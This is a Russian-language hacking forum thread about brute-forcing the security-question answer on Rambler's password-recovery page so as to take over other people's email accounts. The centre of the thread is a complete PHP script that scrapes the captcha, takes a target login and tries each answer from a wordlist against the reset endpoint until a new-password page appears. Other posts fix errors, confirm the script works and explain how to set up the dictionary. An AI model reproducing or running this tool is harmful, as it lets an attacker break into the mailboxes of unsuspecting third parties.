брутим....ответ на контрольный вопрос

еще работает эта тема?))

 

Подскажите как исправить ошибку? Плиз )

 

актуален сегодня скрипт или нет - незнаю (думаю что нет), ошибка- как я и говорил- детская, в 49 строке пропущенна ; (мы ведь с вами уже большие и знаем что в пыхе логическим завершением функции являеться- ; ) , можете затестить, если не работает и вы выложите свой вариант - рабочий, - подниму репутацию (как я и говорил мне просто неинтересна поддержка скрипта т к ислледования были чисто из любопытства)

P.S. А да еще посмотрел скрипт- и увидел что форум в него всобачил пробел при отправке запроса к серваку....

 

По идее скрипт должен быть ещё актуален так как багу никто не прикрывал и походу не собираются

 

Хм...и в чём проблема?

 

уже-ж сняли защиту от скрипткидди, неужели 49 строку трудно закончить с помощью ; ???
https://forum.antichat.ru/showpost.php?p=2099570&postcount=23

 

А точно)), сори.
Но капчу не показывает

 

так подкорректируйте- неужели сложно? вродеж писали что багу неубрали, и я вроде выше писал что поддержка скрипта мне не интересна и если выложиш рабочий вариант здесь- подниму репу....(будет видно что не очередной скрипт кидди а думающий пользователь)

 

Скрипт все еще рабочий, но не могу подкоректировать, что-бы каптчу показывал...

 

для меня вообще загадка что там сложного????? адрес капчи имеет вид http://id.rambler.ru/captcha/e5a412b61b86c8ff4dbe3cd1b7126fa2.jpg и вот этот хеш(e5a412b61b86c8ff4dbe3cd1b7126fa2) дергаем с регуляркой из адреса http://id.rambler.ru/script/reminder.cgi а конкретно из этой строчки

<input type="hidden" name="user.password" value="" />e5a412b61b86c8ff4dbe3cd1b7126fa2
(хеш разумееться каждый раз новый)
Так обьясните мне- неграмотному- чего здесь сложного????? (либо из другого там помоему 4 места откуда можно его дернуть....)

 

Капчу пробовал сделать...
но увы не получилось
_ttp://test5.6te.net/index.php

PHP:

//получаем адрес каптчи 
preg_match("#img id=\"secimage\" src=\"(http://id\.captcha\.rambler\.ru/(.*)\.jpg)#iU",$result, $cap); 

не знаю что сделать с этой частью

 

ап подправьте кто нибудь скрипт.

 

Интересует данная тема.
И такой вопрос: кто-нибудь брутил на mail.ru?

 

Апдейт скрипта. Наверное последний. Сегодня просто сложились звезды, что я был не занят и мне было не впадлу что-то делать (такое бывает очень редко))))

вот

PHP:

<?php
// (c)Kusto & zifanchuck V2
//for forum.antichat.ru
set_time_limit(0);
function curl($url,$post)
{
$cfile = 'cookies.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}


    function read($path)
{
   $file=fopen($path,"r");
   $bufer = fread($file,filesize($path));
   fclose($file);
   return($bufer);
}

$file = 'my.txt';
$domain = $_POST['domain'];
$login = $_POST['login'];
$captcha = $_POST['captcha'];
$id = $_POST['id'];


if(!$domain||!$login||!$captcha||!$id)
{

$result = curl('http://id.rambler.ru/script/reminder.cgi','');
$result = iconv("utf-8", "windows-1251", $result);

//получаем адрес каптчи
preg_match('#<img id="secimage" src="http://id.rambler.ru/captcha/(.*).jpg"#iU',$result, $cap);
$id=$cap[1];

    echo '<form method="POST">
            <p align=center>
                <label for="id-login">кого брутим?</label>
                <span class="indicator">
                    <input type="text" class="text" name="login" />
                    <select id="id-domain" class="text" name="domain" tabindex="1">
                        <option value="rambler.ru"  >@rambler.ru</option>
                        <option value="lenta.ru"  >@lenta.ru</option>
                        <option value="myrambler.ru"  >@myrambler.ru</option>
                        <option value="autorambler.ru"  >@autorambler.ru</option>
                        <option value="ro.ru"  >@ro.ru</option>
                        <option value="r0.ru"  >@r0.ru</option>
                    </select>
                </span><br>
                <img id="secimage" src="http://id.rambler.ru/captcha/'.$id.'.jpg" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы"><br>
            Капча:<input type="text" name="captcha" value="" /><br>
          <input type="hidden" name="id" value="'.$id.'" />
            <input type=submit value="ПОЕХАЛИ!!!"></form>';
    exit;
}
else
{
$answers = explode("\r\n",read($file));

$result = iconv("utf-8", "windows-1251", curl("http://id.rambler.ru/script/reminder.cgi","action=question&skin=id&back=&back_immediate=&uniq_id=".$id."&user.password=&user.login=".$login."&user.domain=".$domain."&user.captcha=".$captcha."&done=%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%BB%D0%B6%D0    %B8%D1%82%D1%8C"));
preg_match("#indicator\"\>\<strong>(.*)\<\/strong#iU",$result, $qves);

    if ($qves[1])
    {
    echo "<B><U><FONT SIZE=5 COLOR=GREEN>$qves[1]</FONT></U></B></br>";

        for($i=0;$i<count($answers);$i++)
        {
        $fam = $answers[$i];
        $bien = iconv("utf-8", "windows-1251",curl('http://id.rambler.ru/script/reminder.cgi','action=password&skin=id&uniq_id='.$_POST['id'].'&back=&user.password=&user.answer='.urlencode(iconv("windows-1251", "utf-8",$fam))));
        if (strstr($bien, "новый пароль")) { echo " поздравляю ответ подобран $fam";exit;}
        else {echo "ответ $fam не подошел <br>";}
        flush();
        }

    }
    else
    {
            echo '<form method="POST">
            <p align=center>
                <b>Неправильно ввели каптчу!</b><br>
                <label for="id-login">кого брутим?</label>
                <span class="indicator">
                    <input type="text" class="text" name="login" />
                    <select id="id-domain" class="text" name="domain" tabindex="1">
                        <option value="rambler.ru"  >@rambler.ru</option>
                        <option value="lenta.ru"  >@lenta.ru</option>
                        <option value="myrambler.ru"  >@myrambler.ru</option>
                        <option value="autorambler.ru"  >@autorambler.ru</option>
                        <option value="ro.ru"  >@ro.ru</option>
                        <option value="r0.ru"  >@r0.ru</option>
                    </select>
                </span><br>
                <img id="secimage" src="http://id.rambler.ru/captcha/'.$id.'.jpg" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы"><br>
            Капча:<input type="text" name="captcha" value="" /><br>
          <input type="hidden" name="id" value="'.$id.'" />
            <input type=submit value="ПОЕХАЛИ!!!"></form>';
    }
}
?>


 

допишу сюда ссылку на исправленную версию
https://forum.antichat.ru/thread206154.html
чтоб не потерялась...

и добавлю в закладки на случай если пригодиться...

---
ЗЫ zifanchuck наверно меня опередил и уже запостил апдейт выше

 

Я как раз для той темы и писал скрипт))) ну точнее не только для нее, а просто попал сегодея на темку, посмотрел что не только тот чел хочет скрипт и решил допилить)

 

братюни, что-то он не находит верный ответ на вопрос

 

только что (на денвере) проверил- правильный ответ поставил на 855 позицию(за все время испытаний- он ниразу не пропускал правильный ответ), правильный ответ был написанн кирилицей- скрипт его нашол за 7 минут, так что тема на сегодняшний день актуальна

P.S. Надеюсь что словарь для брута с предпологаемыми ответами ты назвал my.txt и слова в него сложил в столбик????, а так-же поместил в ту-же дирректорию где находиться скрипт? И не забываем что регистр ответа на контр вопрос- важен(т е Иванова и иванова - это совершенно два разных слова)

 

Проблемка появилась Но не пойму что там в 27й строке..

Использовался скритп "апдейт".

 

Всё работает, спасибо большое. Разобрался.